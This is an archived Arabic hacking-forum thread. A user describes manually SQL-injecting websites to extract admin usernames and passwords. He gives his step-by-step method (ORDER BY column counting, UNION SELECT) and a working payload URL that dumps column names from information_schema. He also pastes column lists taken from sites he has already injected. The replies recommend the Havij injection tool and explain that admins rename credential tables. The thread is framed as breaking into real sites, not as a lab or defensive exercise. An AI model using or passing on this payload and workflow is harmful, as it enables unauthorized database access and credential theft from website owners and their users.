المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : مشكلة عندى بالحقن اثناء استخراج اليوززززر + البسورد

Māśќэɒ Sйĭpэя
06-11-2013, 08:45 PM
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاتة

اهلا اخوانى الكرام كيفكم ان شاء الله تكونة بخير جميعا

وجهتنى مشكلة فى الحقن اليدوى والمشكلة ده تواجهنى كثيرا فى كثير من المواقع اثناء الحقن

المشكلة:~

الان استخرجت الجدوال ومافى لقيت شئ يدل ع اليوزر والبسورد

id,perms,name,position,id,name,display_name,side,o rder,mysql,status,contents,file_id,file_name,file_ link,file_downloaded,id,title,link,author,cat,id,n ame,lang_id,lang_dir,lang_name,lang_author,lang_em ail,id,name,display_name,show_menu,status,id,title ,text,detailtext,author,views,id,message,author,ne ws_id,id,name,desc,lastdate,sitename,defa

وحقنت موقع اخر يعطينا

id,category,word,description

وبردة مافية شئ يدل ع اليوزر والبسورد

انا بعرف عدد الاعمدة عن طريق أمر order+by

وببعدين بعرف عدد الاعمدة المصابة عن طريق union+select

مثلا طلع لنا عدد الاعمدة 8 والعمود المصاب رقم 4

اضع هذا الامر لاستخراج الجدوال

http://sitename/forum/topic_detail.php?id=-1+union+select+1,2,3,group_concat(column_n a m e),5,6,7,8+from+information_schema.columns+where+t able_schema =database()--

ولكن لاسف مابالقى شئ يدل ع اليوزر والبسورد وعطكم مثلين فوق , دئما يحدث معى مثل هذا

ارررجو الحل
ويارت ماحد يقولى استخدم الهافج افضل ومش عارف اية لاء اليدوى افضل وانا مش فاهم غير هذه النقطة ويارت حد يوضحلى وجزاة الله خيرا

الا مجننى ان جميع الاوامر صحيحة والجدوال تستخرج تمام ولكن مالقى اى شئ يدول ع اليوزر
اتمنى الافادة

والسلام عليكم ورحمة الله وبركاتة
....

ابوهريس هكر
06-12-2013, 09:49 AM
اخي استخدم برنامج هافيج فهو اسهل واسرع برنامج لاستخراج الاعمدة واستخراج اليوزرات وعلا فكره ترى اسم الادمن له يمكن اكثر من 20 اسم او اكثر علا حد علمي يعني لازم تكون عندك خبره

Iraqe Hacker
06-13-2013, 12:55 AM
اخي مشكلة الحقن اليدوي هو في هذا الزمن تغير اسم الملفات قبل كانت الاسماء ثابتة تقريبا
admin
pass
وغير ملفات لان معضم اصحاب المواقع يغيرو اسم الملفات من القاعدة
تحياتي